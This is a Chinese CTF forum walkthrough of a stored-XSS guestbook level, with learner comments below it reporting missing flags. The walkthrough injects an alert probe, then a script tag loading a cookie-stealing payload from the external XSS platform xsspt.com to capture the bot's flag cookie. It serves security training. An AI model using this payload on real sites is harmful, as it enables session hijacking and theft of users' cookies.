靶场第四关解题思路--Xss跨站脚本攻击[靶场:为了更多的权限!留言板]

Track-聂风   ·   发表于 2018-05-18 17:48:55   ·   CTF&WP专版

PPT、课程直播、回放已打包至附件! 

直播回放观看:https://ke.qq.com/webcourse/index.html#course_id=275794&term_id=100326238&taid=2183183416440146&vid=y1425jbjoe7


通过对Tips的读取我们明白了这题是一道存储型XSS偷取cookie的题目。(因为flag在cookie中,XSS BOT每10秒就带着有flag的cookie去访问查看留言的页面)


既然是存储型XSS,那么我们先用弹窗去尝试(如果不明白为什么弹窗尝试的话建议先去看我们的直播回放),那么就开始插入<script>alert('zkaq')</script>

为了保险起见我们在所有能输入的地方都写了<script>alert('zkaq')</script>,然后提交留言

成功的弹窗了


因为XSS Payload的强大,也是为了使用的方便,有安全研究者将许多功能封装了起来做成了XSS平台。也是因为插入点一般都有长度限制,所以说xss一般攻击都需要外链。我在这里演示用的是网上的xss平台:http://xsspt.com,需要自己去注册和登录,反正账号密码知道就行了,邮箱反正不验证不建议写真实的。

我们先建立项目,名称什么乱选都行,就是选择模块的时候记得选取这两个

然后你可以看到一叠代码,这个就是两个模块中的XSS Payload,现在你们能够理解为什么要XSS平台了吧,我们用滚轮拖到最下面


<script src=http://xsspt.com/APo4Kj?1526636210></script>

复制下来然后按完成,然后出现项目A 内容0 ,这是因为XSS平台没有收到cookie的缘故,然后回到靶场我们把复制下的这句话插入主题然后提交(我们的插入并不是F12修改源码,而是通过留言板的留言来让网页自动加载出我们插入的恶意语句,因为我们的恶意语句无法显示,有的时候无法看出是否成功插入,所以f12审查源码,看一看是否成功插入)

没显示说明是执行了我插入的语句。然后教你们一个小技巧,在谷歌浏览器可以选择到Sources,然后就可以看到了网页加载了xsspt.com说明XSS成功

然后返回XSS平台看到了有内容了。点击内容名称。

然后展开每一个看看,成功获取了flag



打赏我,让我更有动力~

39 Reply   |  Until 11天前 | 39794 View

基恩
发表于 2020-4-11

开始收到的cookie中没有flag,后来点击项目进行刷新,刷新后flag就出现了。相同情况的姐妹们参考。

评论列表

  • 加载数据中...

编写评论内容

vonsr
发表于 2020-5-26

flag不对

评论列表

  • 加载数据中...

编写评论内容

cxlya
发表于 2020-8-20

这关我xss平台一直没接收到flag后面那几关根本没法玩

评论列表

  • 加载数据中...

编写评论内容

cxlya
发表于 2020-8-20

这关我xss平台一直没接收到flag后面那几关根本没法玩

评论列表

  • 加载数据中...

编写评论内容

菜包子
发表于 2020-12-24

没有管理员登录啊,获取不到flag

评论列表

  • 加载数据中...

编写评论内容

菜包子
发表于 2020-12-24

我拿到cookie为什么进入不了管理员后台

评论列表

  • 加载数据中...

编写评论内容

路yeah
发表于 2021-2-6

呜呜,第三题flag在哪,死活找不到

评论列表

  • 加载数据中...

编写评论内容

hacktot
发表于 2021-4-4

![](https://nc0.cdn.zkaq.cn/md/10145/8e60e878f633db67605bd3bfa3f12a40_60855.png)
没有Flag zenm 回事

评论列表

  • 加载数据中...

编写评论内容

hacker0
发表于 2021-5-5

为啥不能留言了呢?靶场里面

评论列表

  • 加载数据中...

编写评论内容

songyu
发表于 11个月前

没有flag。。。

评论列表

  • 加载数据中...

编写评论内容

漓沐
发表于 9个月前

没有flag怎么玩?

评论列表

  • 加载数据中...

编写评论内容

eiu1110
发表于 9个月前

flag不对的,填flag的时候不要把‘flag=’也当成flag填进去了

评论列表

  • 加载数据中...

编写评论内容

漓沐
发表于 9个月前

我那里出错了?没有flag玩什么

评论列表

  • 加载数据中...

编写评论内容

3429567225
发表于 9个月前

为什么我收到的cookie里没有flog

评论列表

  • 加载数据中...

编写评论内容

1927251229
发表于 9个月前

没有flag

评论列表

  • 加载数据中...

编写评论内容

fengjingyyds
发表于 8个月前

为甚没有flag

评论列表

  • 加载数据中...

编写评论内容

nuocheng
发表于 8个月前


提交哪个

评论列表

  • 加载数据中...

编写评论内容

xiaozhang1314
发表于 5个月前

为什么现在只能获取到自己的Cookie,flag也不见了,我人麻了

评论列表

  • 加载数据中...

编写评论内容

utmost
发表于 11天前

一直没有含flag的cookie,

评论列表

  • 加载数据中...

编写评论内容
首页 1 2 / 2 跳转
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.